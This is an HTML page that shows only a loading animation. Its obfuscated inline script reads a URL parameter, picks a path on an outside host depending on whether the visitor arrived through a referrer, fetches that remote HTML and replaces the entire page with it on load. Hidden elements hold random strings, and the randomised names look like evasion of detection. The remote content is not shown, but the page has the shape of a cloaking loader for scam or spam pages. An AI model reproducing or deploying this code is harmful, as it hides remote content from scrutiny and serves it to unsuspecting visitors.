<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zhx7VPqjtrh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zhx7VPqjtrh .MwevNgW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zhx7VPqjtrh .content {
            line-height: 50px;
            text-align: center
        }

        .zhx7VPqjtrh .img {
            width: 100%
        }

        .zhx7VPqjtrh .PCY6sCRxQ {
            text-align: center
        }

        .zhx7VPqjtrh .PCY6sCRxQ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zhx7VPqjtrh .PCY6sCRxQ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zhx7VPqjtrh .PCY6sCRxQ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zhx7VPqjtrh .PCY6sCRxQ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zhx7VPqjtrh .PCY6sCRxQ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zhx7VPqjtrh .PCY6sCRxQ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zhx7VPqjtrh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function fWa51FW2Ik(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var m77ObrD = fWa51FW2Ik('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ m77ObrD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ m77ObrD +".html?a=share";
		}
		
        PPEe2U5ZZt=url+"#"+new Date().getTime();
        PPEe2U5ZZt && function() {
            $.get(PPEe2U5ZZt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>oIZXhErYLWCzegSbN4tNSgYpUkkH2SeHVFM2w5XsjWXW0</p>
<li style='display:none' >SX2dWx7h5IjZiPzQbKMyOGuwj5NjOwpOe8SW1CYrwkSHnQxcSlmcKVl84SQYY8KYVAS9dvBSjgigWJ4rYjMz1HGWPSO</li>
<p  style='display:none'>oIZXhErYLWCzegSbN4tNSgYpUkkH2SeHVFM2w5XsjWXW0</p>
<h1 style='display:none' >kKVHiPdnL3nkSCBVq8hJRT8FRGAQkorffCOb7i8ktWnOimlvxsaewekH7c5YABnonMzUmZbFBK7kTS1IfpalIXrYOJuz4x</h1>
<div style='display:none'>iKT8537p4MosdRtntQ84kKpbZO2yXF6s3Ui</div><div class="zhx7VPqjtrh">
    <div class="MwevNgW">
        <div class="PCY6sCRxQ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>S4wDRlmYYsczZ3SGbNM08lzMPaIJ</div>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<div style='display:none'>S4wDRlmYYsczZ3SGbNM08lzMPaIJ</div></body>
</html>